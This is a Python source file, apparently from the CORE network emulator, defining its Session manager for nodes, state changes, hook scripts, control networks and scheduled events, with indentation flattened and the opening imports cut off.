from core.misc.utils import check_call, mutedetach, readfileintodict, \
filemunge, filedemunge
from core.conf import ConfigurableManager, Configurable
from core.location import CoreLocation
from core.service import CoreServices
from core.broker import CoreBroker
from core.mobility import MobilityManager
from core.netidsubnetmap import NetIDSubnetMapManager
from core.sdt import Sdt
from core.misc.ipaddr import MacAddr
from core.misc.event import EventLoop
from core.constants import *
from core.xen import xenconfig
class Session(object):
# sessions that get automatically shutdown when the process
# terminates normally
__sessions = set()
verbose = False
''' CORE session manager.
'''
def __init__(self, sessionid = None, cfg = {}, server = None,
persistent = False, mkdir = True):
if sessionid is None:
# try to keep this short since it's used to construct
# network interface names
pid = os.getpid()
sessionid = ((pid >> 16) ^
(pid & ((1 << 16) - 1)))
sessionid ^= ((id(self) >> 16) ^ (id(self) & ((1 << 16) - 1)))
sessionid &= 0xffff
self.sessionid = sessionid
self.sessiondir = os.path.join(tempfile.gettempdir(),
"pycore.%s" % self.sessionid)
if mkdir:
os.mkdir(self.sessiondir)
self.name = None
self.filename = None
self.thumbnail = None
self.user = None
self.node_count = None
self._time = time.time()
self.evq = EventLoop()
# dict of objects: all nodes and nets
self._objs = {}
self._objslock = threading.Lock()
# dict of configurable objects
self._confobjs = {}
self._confobjslock = threading.Lock()
self._handlers = set()
self._handlerslock = threading.Lock()
self._hooks = {}
self.setstate(state=coreapi.CORE_EVENT_DEFINITION_STATE,
info=False, sendevent=False)
# dict of configuration items from /etc/core/core.conf config file
self.cfg = cfg
self.server = server
if not persistent:
self.addsession(self)
self.master = False
self.broker = CoreBroker(session=self, verbose=self.verbose)
self.location = CoreLocation(self)
self.mobility = MobilityManager(self)
self.netidmanager = NetIDSubnetMapManager(self)
self.services = CoreServices(self)
self.emane = emane.Emane(self)
self.xen = xenconfig.XenConfigManager(self)
self.sdt = Sdt(self)
# future parameters set by the GUI may go here
self.options = SessionConfig(self)
self.metadata = SessionMetaData(self)
@classmethod
def addsession(cls, session):
cls.__sessions.add(session)
@classmethod
def delsession(cls, session):
try:
cls.__sessions.remove(session)
except KeyError:
pass
@classmethod
def atexit(cls):
while cls.__sessions:
s = cls.__sessions.pop()
if cls.verbose:
print(("WARNING: automatically shutting down " \
"non-persistent session %s" % s.sessionid), file = sys.stderr)
s.shutdown()
def __del__(self):
# note: there is no guarantee this will ever run
self.shutdown()
def shutdown(self):
''' Shut down all emulation objects and remove the session directory.
'''
self.emane.shutdown()
self.broker.shutdown()
self.sdt.shutdown()
self.delobjs()
self.netidmanager.clear()
preserve = False
if hasattr(self.options, 'preservedir'):
if self.options.preservedir == '1':
preserve = True
if not preserve:
shutil.rmtree(self.sessiondir, ignore_errors = True)
if self.server:
self.server.delsession(self)
self.delsession(self)
def isconnected(self):
''' Returns true if this session has a request handler.
'''
with self._handlerslock:
if len(self._handlers) == 0:
return False
else:
return True
def connect(self, handler):
''' Set the request handler for this session, making it connected.
'''
# the master flag will only be set after a GUI has connected with the
# handler, e.g. not during normal startup
if handler.master is True:
self.master = True
with self._handlerslock:
self._handlers.add(handler)
def disconnect(self, handler):
''' Disconnect a request handler from this session. Shutdown this
session if there is no running emulation.
'''
with self._handlerslock:
try:
self._handlers.remove(handler)
except KeyError:
raise ValueError("Handler %s not associated with this session" % handler)
num_handlers = len(self._handlers)
if num_handlers == 0:
# shut down this session unless we are instantiating, running,
# or collecting final data
if self.getstate() < coreapi.CORE_EVENT_INSTANTIATION_STATE or \
self.getstate() > coreapi.CORE_EVENT_DATACOLLECT_STATE:
self.shutdown()
def broadcast(self, src, msg):
''' Send Node and Link CORE API messages to all handlers connected to this session.
'''
self._handlerslock.acquire()
for handler in self._handlers:
if handler == src:
continue
if isinstance(msg, coreapi.CoreNodeMessage) or \
isinstance(msg, coreapi.CoreLinkMessage):
try:
handler.sendall(msg.rawmsg)
except Exception as e:
self.warn("sendall() error: %s" % e)
self._handlerslock.release()
def broadcastraw(self, src, data):
''' Broadcast raw data to all handlers except src.
'''
self._handlerslock.acquire()
for handler in self._handlers:
if handler == src:
continue
try:
handler.sendall(data)
except Exception as e:
self.warn("sendall() error: %s" % e)
self._handlerslock.release()
def gethandler(self):
''' Get one of the connected handlers, preferably the master.
'''
with self._handlerslock:
if len(self._handlers) == 0:
return None
for handler in self._handlers:
if handler.master:
return handler
for handler in self._handlers:
return handler
def setstate(self, state, info = False, sendevent = False,
returnevent = False):
''' Set the session state. When info is true, log the state change
event using the session handler's info method. When sendevent is
true, generate a CORE API Event Message and send to the connected
entity.
'''
self._time = time.time()
self._state = state
replies = []
if self.isconnected() and info:
statename = coreapi.state_name(state)
with self._handlerslock:
for handler in self._handlers:
handler.info("SESSION %s STATE %d: %s at %s" % \
(self.sessionid, state, statename,
time.ctime()))
self.writestate(state)
self.runhook(state)
if self.isconnected() and sendevent:
tlvdata = b""
tlvdata += coreapi.CoreEventTlv.pack(coreapi.CORE_TLV_EVENT_TYPE,
state)
msg = coreapi.CoreEventMessage.pack(0, tlvdata)
# send Event Message to connected handlers (e.g. GUI)
try:
if returnevent:
replies.append(msg)
else:
self.broadcastraw(None, msg)
except Exception as e:
self.warn("Error sending Event Message: %s" % e)
# also inform slave servers
tmp = self.broker.handlerawmsg(msg)
return replies
def getstate(self):
''' Retrieve the current state of the session.
'''
return self._state
def writestate(self, state):
''' Write the current state to a state file in the session dir.
'''
try:
f = open(os.path.join(self.sessiondir, "state"), "w")
f.write("%d %s\n" % (state, coreapi.state_name(state)))
f.close()
except Exception as e:
self.warn("Error writing state file: %s" % e)
def runhook(self, state, hooks=None):
''' Run hook scripts upon changing states.
If hooks is not specified, run all hooks in the given state.
'''
if state not in self._hooks:
return
if hooks is None:
hooks = self._hooks[state]
for (filename, data) in hooks:
try:
f = open(os.path.join(self.sessiondir, filename), "w")
f.write(data)
f.close()
except Exception as e:
self.warn("Error writing hook '%s': %s" % (filename, e))
self.info("Running hook %s for state %s" % (filename, state))
try:
check_call(["/bin/sh", filename], cwd=self.sessiondir,
env=self.getenviron())
except Exception as e:
self.warn("Error running hook '%s' for state %s: %s" %
(filename, state, e))
def sethook(self, type, filename, srcname, data):
''' Store a hook from a received File Message.
'''
if srcname is not None:
raise NotImplementedError
(hookid, state) = type.split(':')[:2]
if not state.isdigit():
self.warn("Error setting hook having state '%s'" % state)
return
state = int(state)
hook = (filename, data)
if state not in self._hooks:
self._hooks[state] = [hook,]
else:
self._hooks[state] += hook
# immediately run a hook if it is in the current state
# (this allows hooks in the definition and configuration states)
if self.getstate() == state:
self.runhook(state, hooks = [hook,])
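# Illustrative hook type string (hypothetical): a File Message whose type
# is "hook:4" stores a script to run upon entering state 4; see the
# matching "hook:%s" encoding in sendobjs() below.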
def delhooks(self):
''' Clear the hook scripts dict.
'''
self._hooks = {}
def getenviron(self, state=True):
''' Get an environment suitable for a subprocess.Popen call.
This is the current process environment with some session-specific
variables.
'''
env = os.environ.copy()
env['SESSION'] = "%s" % self.sessionid
env['SESSION_DIR'] = "%s" % self.sessiondir
env['SESSION_NAME'] = "%s" % self.name
env['SESSION_FILENAME'] = "%s" % self.filename
env['SESSION_USER'] = "%s" % self.user
env['SESSION_NODE_COUNT'] = "%s" % self.node_count
if state:
env['SESSION_STATE'] = "%s" % self.getstate()
try:
readfileintodict(os.path.join(CORE_CONF_DIR, "environment"), env)
except IOError:
pass
if self.user:
try:
readfileintodict(os.path.join('/home', self.user, ".core",
"environment"), env)
except IOError:
pass
return env
def setthumbnail(self, thumbfile):
''' Set the thumbnail filename. Move files from /tmp to session dir.
'''
if not os.path.exists(thumbfile):
self.thumbnail = None
return
dstfile = os.path.join(self.sessiondir, os.path.basename(thumbfile))
shutil.move(thumbfile, dstfile)
#print "thumbnail: %s -> %s" % (thumbfile, dstfile)
self.thumbnail = dstfile
def setuser(self, user):
''' Set the username for this session. Update the permissions of the
session dir to allow the user write access.
'''
if user is not None:
try:
uid = pwd.getpwnam(user).pw_uid
gid = os.stat(self.sessiondir).st_gid
os.chown(self.sessiondir, uid, gid)
except Exception as e:
self.warn("Failed to set permission on %s: %s" % (self.sessiondir, e))
self.user = user
def objs(self):
''' Return iterator over the emulation object dictionary.
'''
return iter(list(self._objs.values()))
def getobjid(self):
''' Return a unique, random object id.
'''
self._objslock.acquire()
while True:
id = random.randint(1, 0xFFFF)
if id not in self._objs:
break
self._objslock.release()
return id
def addobj(self, cls, *clsargs, **clskwds):
''' Add an emulation object.
'''
obj = cls(self, *clsargs, **clskwds)
self._objslock.acquire()
if obj.objid in self._objs:
self._objslock.release()
obj.shutdown()
raise KeyError("non-unique object id %s for %s" % (obj.objid, obj))
self._objs[obj.objid] = obj
self._objslock.release()
return obj
def obj(self, objid):
''' Get an emulation object.
'''
if objid not in self._objs:
raise KeyError("unknown object id %s" % (objid))
return self._objs[objid]
def objbyname(self, name):
''' Get an emulation object using its name attribute.
'''
with self._objslock:
for obj in self.objs():
if hasattr(obj, "name") and obj.name == name:
return obj
raise KeyError("unknown object with name %s" % (name))
def delobj(self, objid):
''' Remove an emulation object.
'''
self._objslock.acquire()
try:
o = self._objs.pop(objid)
except KeyError:
o = None
self._objslock.release()
if o:
o.shutdown()
del o
gc.collect()
# print "gc count:", gc.get_count()
# for o in gc.get_objects():
# if isinstance(o, PyCoreObj):
# print "XXX XXX XXX PyCoreObj:", o
# for r in gc.get_referrers(o):
# print "XXX XXX XXX referrer:", gc.get_referrers(o)
def delobjs(self):
''' Clear the _objs dictionary, and call each obj.shutdown() routine.
'''
self._objslock.acquire()
while self._objs:
k, o = self._objs.popitem()
o.shutdown()
self._objslock.release()
def writeobjs(self):
''' Write objects to a 'nodes' file in the session dir.
The 'nodes' file lists:
number, name, api-type, class-type
'''
try:
f = open(os.path.join(self.sessiondir, "nodes"), "w")
with self._objslock:
for objid in sorted(self._objs.keys()):
o = self._objs[objid]
f.write("%s %s %s %s\n" % (objid, o.name, o.apitype, type(o)))
f.close()
except Exception as e:
self.warn("Error writing nodes file: %s" % e)
def addconfobj(self, objname, type, callback):
''' Objects can register configuration objects that are included in
the Register Message and may be configured via the Configure
Message. The callback is invoked when receiving a Configure Message.
'''
if type not in coreapi.reg_tlvs:
raise Exception("invalid configuration object type")
self._confobjslock.acquire()
self._confobjs[objname] = (type, callback)
self._confobjslock.release()
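# Registration sketch (illustrative names): a manager registers a callback
# that is invoked for Configure Messages addressed to it, e.g.
#   session.addconfobj('mymodel', coreapi.CORE_TLV_REG_WIRELESS,
#                      self.configure)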
def confobj(self, objname, session, msg):
''' Invoke the callback for an object upon receipt of a Configure
Message for that object. A no-op if the object doesn't exist.
'''
replies = []
self._confobjslock.acquire()
if objname == "all":
for objname in self._confobjs:
(type, callback) = self._confobjs[objname]
reply = callback(session, msg)
if reply is not None:
replies.append(reply)
self._confobjslock.release()
return replies
if objname in self._confobjs:
(type, callback) = self._confobjs[objname]
self._confobjslock.release()
reply = callback(session, msg)
if reply is not None:
replies.append(reply)
return replies
else:
self.info("session object doesn't own model '%s', ignoring" % \
objname)
self._confobjslock.release()
return replies
def confobjs_to_tlvs(self):
''' Turn the configuration objects into a list of Register Message TLVs.
'''
tlvdata = b""
self._confobjslock.acquire()
for objname in self._confobjs:
(type, callback) = self._confobjs[objname]
# type must be in coreapi.reg_tlvs
tlvdata += coreapi.CoreRegTlv.pack(type, objname)
self._confobjslock.release()
return tlvdata
def info(self, msg):
''' Utility method for writing output to stdout.
'''
if hasattr(self.options, 'clientlogfile'):
fname = self.options.clientlogfile
with open(fname, 'a') as logfile:
print(msg, file = logfile, flush = True)
else:
print(msg, file = sys.stdout, flush = True)
sys.stdout.flush()
def warn(self, msg):
''' Utility method for writing output to stderr.
'''
if hasattr(self.options, 'clientlogfile'):
fname = self.options.clientlogfile
with open(fname, 'a') as logfile:
print(msg, file = logfile, flush = True)
else:
print(msg, file = sys.stderr, flush = True)
sys.stderr.flush()
def dumpsession(self):
''' Debug print this session.
'''
self.info("session id=%s name=%s state=%s connected=%s" % \
(self.sessionid, self.name, self._state, self.isconnected()))
num = len(self._objs)
self.info(" file=%s thumb=%s nc=%s/%s" % \
(self.filename, self.thumbnail, self.node_count, num))
def exception(self, level, source, objid, text):
''' Generate an Exception Message
'''
vals = (objid, str(self.sessionid), level, source, time.ctime(), text)
types = ("NODE", "SESSION", "LEVEL", "SOURCE", "DATE", "TEXT")
tlvdata = b''
for (t,v) in zip(types, vals):
if v is not None:
tlvdata += coreapi.CoreExceptionTlv.pack(
eval("coreapi.CORE_TLV_EXCP_%s" % t), v)
msg = coreapi.CoreExceptionMessage.pack(0, tlvdata)
self.warn("exception: %s (%s) %s" % (source, objid, text))
# send Exception Message to connected handlers (e.g. GUI)
self.broadcastraw(None, msg)
def getcfgitem(self, cfgname):
''' Return an entry from the configuration dictionary that comes from
command-line arguments and/or the core.conf config file.
'''
if cfgname not in self.cfg:
return None
else:
return self.cfg[cfgname]
def getcfgitembool(self, cfgname, defaultifnone = None):
''' Return a boolean entry from the configuration dictionary, may
return None if undefined.
'''
item = self.getcfgitem(cfgname)
if item is None:
return defaultifnone
return bool(item.lower() == "true")
def getcfgitemint(self, cfgname, defaultifnone = None):
''' Return an integer entry from the configuration dictionary, may
return None if undefined.
'''
item = self.getcfgitem(cfgname)
if item is None:
return defaultifnone
return int(item)
def instantiate(self, handler=None):
''' We have entered the instantiation state, invoke startup methods
of various managers and boot the nodes. Validate nodes and check
for transition to the runtime state.
'''
self.writeobjs()
# controlnet may be needed by some EMANE models
self.addremovectrlif(node=None, remove=False)
if self.emane.startup() == self.emane.NOT_READY:
return # instantiate() will be invoked again upon Emane.configure()
self.broker.startup()
self.mobility.startup()
# boot the services on each node
self.bootnodes(handler)
# allow time for processes to start
time.sleep(0.125)
self.validatenodes()
self.emane.poststartup()
# assume either all nodes have booted already, or there are some
# nodes on slave servers that will be booted and those servers will
# send a node status response message
self.checkruntime()
def getnodecount(self):
''' Returns the number of CoreNodes and CoreNets, except for those
that are not considered in the GUI's node count.
'''
with self._objslock:
count = len([x for x in self.objs() if not isinstance(x, (nodes.PtpNet, nodes.CtrlNet))])
# on Linux, GreTapBridges are auto-created, not part of
# GUI's node count
if 'GreTapBridge' in globals():
count -= len([x for x in self.objs() if isinstance(x, GreTapBridge) and not \
isinstance(x, nodes.TunnelNode)])
return count
def checkruntime(self):
''' Check if we have entered the runtime state, that all nodes have been
started and the emulation is running. Start the event loop once we
have entered runtime (time=0).
'''
# this is called from instantiate() after receiving an event message
# for the instantiation state, and from the broker when distributed
# nodes have been started
if self.node_count is None:
return
if self.getstate() == coreapi.CORE_EVENT_RUNTIME_STATE:
return
session_node_count = int(self.node_count)
nc = self.getnodecount()
# count booted nodes not emulated on this server
# TODO: let slave server determine RUNTIME and wait for Event Message
# broker.getbootcount() counts all CoreNodes from status response
# messages, plus any remote WLANs; remote EMANE, hub, switch, etc.
# are already counted in self._objs
nc += self.broker.getbootcount()
self.info("Checking for runtime with %d of %d session nodes" % \
(nc, session_node_count))
if nc < session_node_count:
return # do not have information on all nodes yet
# information on all nodes has been received and they have been started
# enter the runtime state
# TODO: more sophisticated checks to verify that all nodes and networks
# are running
state = coreapi.CORE_EVENT_RUNTIME_STATE
self.evq.run()
self.setstate(state, info=True, sendevent=True)
def datacollect(self):
''' Tear down a running session. Stop the event loop and any running
nodes, and perform clean-up.
'''
self.evq.stop()
with self._objslock:
for obj in self.objs():
if isinstance(obj, nodes.PyCoreNode):
self.services.stopnodeservices(obj)
self.emane.shutdown()
self.updatectrlifhosts(remove=True)
self.addremovectrlif(node=None, remove=True)
# self.checkshutdown() is currently invoked from node delete handler
def checkshutdown(self):
''' Check if we have entered the shutdown state, when no running nodes
and links remain.
'''
with self._objslock:
nc = len(self._objs)
# TODO: this doesn't consider slave server node counts
# wait for slave servers to enter SHUTDOWN state, then master session
# can enter SHUTDOWN
replies = ()
if nc == 0:
replies = self.setstate(state=coreapi.CORE_EVENT_SHUTDOWN_STATE,
info=True, sendevent=True, returnevent=True)
self.sdt.shutdown()
return replies
def setmaster(self, handler):
''' Look for the specified handler and set our master flag
appropriately. Returns True if we are connected to the given
handler.
'''
with self._handlerslock:
for h in self._handlers:
if h != handler:
continue
self.master = h.master
return True
return False
def shortsessionid(self):
''' Return a shorter version of the session ID, appropriate for
interface names, where length may be limited.
'''
return (self.sessionid >> 8) ^ (self.sessionid & ((1 << 8) - 1))
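# e.g. sessionid 0x1234 collapses to 0x12 ^ 0x34 == 0x26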
def bootnodes(self, handler):
''' Invoke the boot() procedure for all nodes and send back node
messages to the GUI for node messages that had the status
request flag.
'''
#self.addremovectrlif(node=None, remove=False)
with self._objslock:
for n in self.objs():
if not isinstance(n, nodes.PyCoreNode):
continue
if isinstance(n, nodes.RJ45Node):
continue
# add a control interface if configured
self.addremovectrlif(node=n, remove=False)
n.boot()
nodenum = n.objid
if handler is None:
continue
if nodenum in handler.nodestatusreq:
tlvdata = b""
tlvdata += coreapi.CoreNodeTlv.pack(coreapi.CORE_TLV_NODE_NUMBER,
nodenum)
tlvdata += coreapi.CoreNodeTlv.pack(coreapi.CORE_TLV_NODE_EMUID,
n.objid)
reply = coreapi.CoreNodeMessage.pack(coreapi.CORE_API_ADD_FLAG \
| coreapi.CORE_API_LOC_FLAG,
tlvdata)
try:
handler.request.sendall(reply)
except Exception as e:
self.warn("sendall() error: %s" % e)
del handler.nodestatusreq[nodenum]
self.updatectrlifhosts()
def validatenodes(self):
with self._objslock:
for n in self.objs():
# TODO: this can be extended to validate everything
# such as vnoded process, bridges, etc.
if not isinstance(n, nodes.PyCoreNode):
continue
if isinstance(n, nodes.RJ45Node):
continue
n.validate()
def addremovectrlnet(self, remove=False):
''' Create a control network bridge as necessary.
When the remove flag is True, remove the bridge that connects control
interfaces.
'''
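# The prefix comes from the 'controlnet' entry in core.conf or from the
# session options; illustrative values:
#   controlnet = 172.16.0.0/24
# or, per-server for distributed sessions (parsed as 'server:prefix' below):
#   controlnet = master:172.16.1.0/24 slave1:172.16.2.0/24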
prefix = None
try:
if self.cfg['controlnet']:
prefix = self.cfg['controlnet']
except KeyError:
pass
if hasattr(self.options, 'controlnet'):
prefix = self.options.controlnet
if not prefix:
return None # no controlnet needed
# return any existing controlnet bridge
id = "ctrlnet"
try:
ctrlnet = self.obj(id)
if remove:
self.delobj(ctrlnet.objid)
return None
return ctrlnet
except KeyError:
if remove:
return None
# build a new controlnet bridge
updown_script = None
try:
if self.cfg['controlnet_updown_script']:
updown_script = self.cfg['controlnet_updown_script']
except KeyError:
pass
prefixes = prefix.split()
if len(prefixes) > 1:
assign_address = True
if self.master:
try:
prefix = prefixes[0].split(':', 1)[1]
except IndexError:
prefix = prefixes[0] # possibly only one server
else:
# slave servers have their name and localhost in the serverlist
servers = self.broker.getserverlist()
servers.remove('localhost')
prefix = None
for server_prefix in prefixes:
server, p = server_prefix.split(':')
if server == servers[0]:
prefix = p
break
if not prefix:
msg = "Control network prefix not found for server '%s'" % \
servers[0]
self.exception(coreapi.CORE_EXCP_LEVEL_ERROR,
"Session.addremovectrlnet()", None, msg)
prefix = prefixes[0].split(':', 1)[1]
assign_address = False
else:
# with one prefix, only master gets a ctrlnet address
assign_address = self.master
ctrlnet = self.addobj(cls=nodes.CtrlNet, objid=id, prefix=prefix,
assign_address=assign_address,
updown_script=updown_script)
# tunnels between controlnets will be built with Broker.addnettunnels()
self.broker.addnet(id)
for server in self.broker.getserverlist():
self.broker.addnodemap(server, id)
return ctrlnet
def addremovectrlif(self, node, remove=False):
''' Add a control interface to a node when a 'controlnet' prefix is
listed in the config file or session options. Uses
addremovectrlnet() to build or remove the control bridge.
'''
ctrlnet = self.addremovectrlnet(remove)
if ctrlnet is None:
return
if node is None:
return
ctrlip = node.objid
try:
addrlist = ["%s/%s" % (ctrlnet.prefix.addr(ctrlip),
ctrlnet.prefix.prefixlen)]
except ValueError:
msg = "Control interface not added to node %s. " % node.objid
msg += "Invalid control network prefix (%s). " % ctrlnet.prefix
msg += "A longer prefix length may be required for this many nodes."
node.exception(coreapi.CORE_EXCP_LEVEL_ERROR,
"Session.addremovectrlif()", msg)
return
ifi = node.newnetif(net = ctrlnet, ifindex = ctrlnet.CTRLIF_IDX_BASE,
ifname = "ctrl0", hwaddr = MacAddr.random(),
addrlist = addrlist)
node.netif(ifi).control = True
def updatectrlifhosts(self, remove=False):
''' Add the IP addresses of control interfaces to the /etc/hosts file.
'''
if not self.getcfgitembool('update_etc_hosts', False):
return
id = "ctrlnet"
try:
ctrlnet = self.obj(id)
except KeyError:
return
header = "CORE session %s host entries" % self.sessionid
if remove:
if self.getcfgitembool('verbose', False):
self.info("Removing /etc/hosts file entries.")
filedemunge('/etc/hosts', header)
return
entries = []
for ifc in ctrlnet.netifs():
name = ifc.node.name
for addr in ifc.addrlist:
entries.append("%s %s" % (addr.split('/')[0], ifc.node.name))
if self.getcfgitembool('verbose', False):
self.info("Adding %d /etc/hosts file entries." % len(entries))
filemunge('/etc/hosts', header, '\n'.join(entries) + '\n')
def runtime(self):
''' Return the current time we have been in the runtime state, or zero
if not in runtime.
'''
if self.getstate() == coreapi.CORE_EVENT_RUNTIME_STATE:
return time.time() - self._time
else:
return 0.0
def addevent(self, etime, node=None, name=None, data=None):
''' Add an event to the event queue, with a start time relative to the
start of the runtime state.
'''
etime = float(etime)
runtime = self.runtime()
if runtime > 0.0:
if etime <= runtime:
self.warn("Could not schedule past event for time %s " \
"(run time is now %s)" % (etime, runtime))
return
etime = etime - runtime
func = self.runevent
self.evq.add_event(etime, func, node=node, name=name, data=data)
if name is None:
name = ""
self.info("scheduled event %s at time %s data=%s" % \
(name, etime + runtime, data))
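# Scheduling sketch (hypothetical node id and command):
#   session.addevent(10.0, node=1, name="probe",
#                    data="ping -c 1 10.0.0.1")
# runs the command on node 1 ten seconds into the runtime state.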
def runevent(self, node=None, name=None, data=None):
''' Run a scheduled event, executing commands in the data string.
'''
now = self.runtime()
if name is None:
name = ""
self.info("running event %s at time %s cmd=%s" % (name, now, data))
if node is None:
mutedetach(shlex.split(data))
else:
n = self.obj(node)
n.cmd(shlex.split(data), wait=False)
def sendobjs(self):
''' Return API messages that describe the current session.
'''
replies = []
nn = 0
ni = 0
# send NetIDSubnetMap
msgs = self.netidmanager.toconfmsgs(flags=0, nodenum=-1,
typeflags=coreapi.CONF_TYPE_FLAGS_UPDATE)
replies.extend(msgs)
# send node messages for node and network objects
with self._objslock:
for obj in self.objs():
created_nodemsg = False
msg = obj.tonodemsg(flags = coreapi.CORE_API_ADD_FLAG)
if msg is not None:
created_nodemsg = True
replies.append(msg)
nn += 1
# send interface messages from interface objects
# if obj has tonodemsg(), then it's a node and thus contains
# interfaces. We now iterate over those interfaces and push
# one API message for each.
if created_nodemsg:
for ifindex, interface in list(obj._netif.items()):
msg = interface.tointerfacemsg(flags = coreapi.CORE_API_ADD_FLAG)
if msg is not None:
replies.append(msg)
ni += 1
nl = 0
# send link messages from net objects
with self._objslock:
for obj in self.objs():
linkmsgs = obj.tolinkmsgs(flags = coreapi.CORE_API_ADD_FLAG)
for msg in linkmsgs:
replies.append(msg)
nl += 1
# send model info
configs = self.mobility.getallconfigs()
configs += self.emane.getallconfigs()
for (nodenum, cls, values) in configs:
#cls = self.mobility._modelclsmap[conftype]
msg = cls.toconfmsg(flags=0, nodenum=nodenum,
typeflags=coreapi.CONF_TYPE_FLAGS_UPDATE,
values=values)
replies.append(msg)
# service customizations
svc_configs = self.services.getallconfigs()
for (nodenum, svc) in svc_configs:
opaque = "service:%s" % svc._name
tlvdata = b""
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_NODE,
nodenum)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_OPAQUE,
opaque)
tmp = coreapi.CoreConfMessage(flags=0, hdr=b"", data=tlvdata)
replies.append(self.services.configure_request(tmp))
for (filename, data) in self.services.getallfiles(svc):
flags = coreapi.CORE_API_ADD_FLAG
tlvdata = coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_NODE,
nodenum)
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_NAME,
str(filename))
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_TYPE,
opaque)
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_DATA,
str(data))
replies.append(coreapi.CoreFileMessage.pack(flags, tlvdata))
# TODO: send location info
# replies.append(self.location.toconfmsg())
# send hook scripts
for state in sorted(self._hooks.keys()):
for (filename, data) in self._hooks[state]:
flags = coreapi.CORE_API_ADD_FLAG
tlvdata = coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_NAME,
str(filename))
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_TYPE,
"hook:%s" % state)
tlvdata += coreapi.CoreFileTlv.pack(coreapi.CORE_TLV_FILE_DATA,
str(data))
replies.append(coreapi.CoreFileMessage.pack(flags, tlvdata))
# send meta data
tmp = coreapi.CoreConfMessage(flags=0, hdr=b"", data=b"")
opts = self.options.configure_request(tmp,
typeflags = coreapi.CONF_TYPE_FLAGS_UPDATE)
if opts:
replies.append(opts)
meta = self.metadata.configure_request(tmp,
typeflags = coreapi.CONF_TYPE_FLAGS_UPDATE)
if meta:
replies.append(meta)
self.info("informing GUI about %d nodes, %d interfaces and %d links" % (nn, ni, nl))
return replies
class SessionConfig(ConfigurableManager, Configurable):
_name = 'session'
_type = coreapi.CORE_TLV_REG_UTILITY
_confmatrix = [
("controlnet", coreapi.CONF_DATA_TYPE_STRING, '', '',
'Control network'),
("enablerj45", coreapi.CONF_DATA_TYPE_BOOL, '1', 'On,Off',
'Enable RJ45s'),
("preservedir", coreapi.CONF_DATA_TYPE_BOOL, '0', 'On,Off',
'Preserve session dir'),
("enablesdt", coreapi.CONF_DATA_TYPE_BOOL, '0', 'On,Off',
'Enable SDT3D output'),
("enableipv4", coreapi.CONF_DATA_TYPE_BOOL, '1', 'On,Off',
'Enable IPv4'),
("enableipv6", coreapi.CONF_DATA_TYPE_BOOL, '1', 'On,Off',
'Enable IPv6'),
]
_confgroups = "Options:1-%d" % len(_confmatrix)
def __init__(self, session):
ConfigurableManager.__init__(self, session)
session.broker.handlers += (self.handledistributed, )
self.reset()
def reset(self):
defaults = self.getdefaultvalues()
for k in self.getnames():
# value may come from config file
v = self.session.getcfgitem(k)
if v is None:
v = self.valueof(k, defaults)
v = self.offontobool(v)
setattr(self, k, v)
def configure_values(self, msg, values):
return self.configure_values_keyvalues(msg, values, self,
self.getnames())
def configure_request(self, msg, typeflags = coreapi.CONF_TYPE_FLAGS_NONE):
nodenum = msg.gettlv(coreapi.CORE_TLV_CONF_NODE)
values = []
for k in self.getnames():
v = getattr(self, k)
if v is None:
v = ""
values.append("%s" % v)
return self.toconfmsg(0, nodenum, typeflags, values)
def handledistributed(self, msg):
''' Handle the session options config message as it has reached the
broker. Options requiring modification for distributed operation should
be handled here.
'''
if not self.session.master:
return
if msg.msgtype != coreapi.CORE_API_CONF_MSG or \
msg.gettlv(coreapi.CORE_TLV_CONF_OBJ) != "session":
return
values_str = msg.gettlv(coreapi.CORE_TLV_CONF_VALUES)
if values_str is None:
return
values = values_str.split('|')
if not self.haskeyvalues(values):
return
for v in values:
key, value = v.split('=', 1)
if key == "controlnet":
self.handledistributedcontrolnet(msg, values, values.index(v))
def handledistributedcontrolnet(self, msg, values, idx):
''' Modify Config Message if multiple control network prefixes are
defined. Map server names to prefixes and repack the message before
it is forwarded to slave servers.
'''
kv = values[idx]
key, value = kv.split('=', 1)
controlnets = value.split()
if len(controlnets) < 2:
return # multiple controlnet prefixes do not exist
servers = self.session.broker.getserverlist()
if len(servers) < 2:
return # not distributed
servers.remove("localhost")
servers.insert(0, "localhost") # master always gets first prefix
# create list of "server1:ctrlnet1 server2:ctrlnet2 ..."
controlnets = ["%s:%s" % (x[0],x[1]) for x in zip(servers, controlnets)]
values[idx] = "controlnet=%s" % (' '.join(controlnets))
values_str = '|'.join(values)
msg.tlvdata[coreapi.CORE_TLV_CONF_VALUES] = values_str
msg.repack()
class SessionMetaData(ConfigurableManager):
''' Metadata is simply stored in a configs[] dict. Key=value pairs are
passed in from configure messages destined to the "metadata" object.
The data is not otherwise interpreted or processed.
'''
_name = "metadata"
_type = coreapi.CORE_TLV_REG_UTILITY
def configure_values(self, msg, values):
if values is None:
return None
kvs = values.split('|')
for kv in kvs:
try:
(key, value) = kv.split('=', 1)
except ValueError:
raise ValueError("invalid key in metdata: %s" % kv)
self.additem(key, value)
return None
def configure_request(self, msg, typeflags = coreapi.CONF_TYPE_FLAGS_NONE):
nodenum = msg.gettlv(coreapi.CORE_TLV_CONF_NODE)
values_str = "|".join(["%s=%s" % (k_v[0],k_v[1]) for k_v in list(self.items())])
return self.toconfmsg(0, nodenum, typeflags, values_str)
def toconfmsg(self, flags, nodenum, typeflags, values_str):
tlvdata = b""
if nodenum is not None:
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_NODE,
nodenum)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_OBJ,
self._name)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_TYPE,
typeflags)
datatypes = tuple( [coreapi.CONF_DATA_TYPE_STRING for k_v1 in list(self.items())] )
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_DATA_TYPES,
datatypes)
tlvdata += coreapi.CoreConfTlv.pack(coreapi.CORE_TLV_CONF_VALUES,
values_str)
msg = coreapi.CoreConfMessage.pack(flags, tlvdata)
return msg
def additem(self, key, value):
self.configs[key] = value
def items(self):
return iter(list(self.configs.items()))
atexit.register(Session.atexit)
| bsd-3-clause |
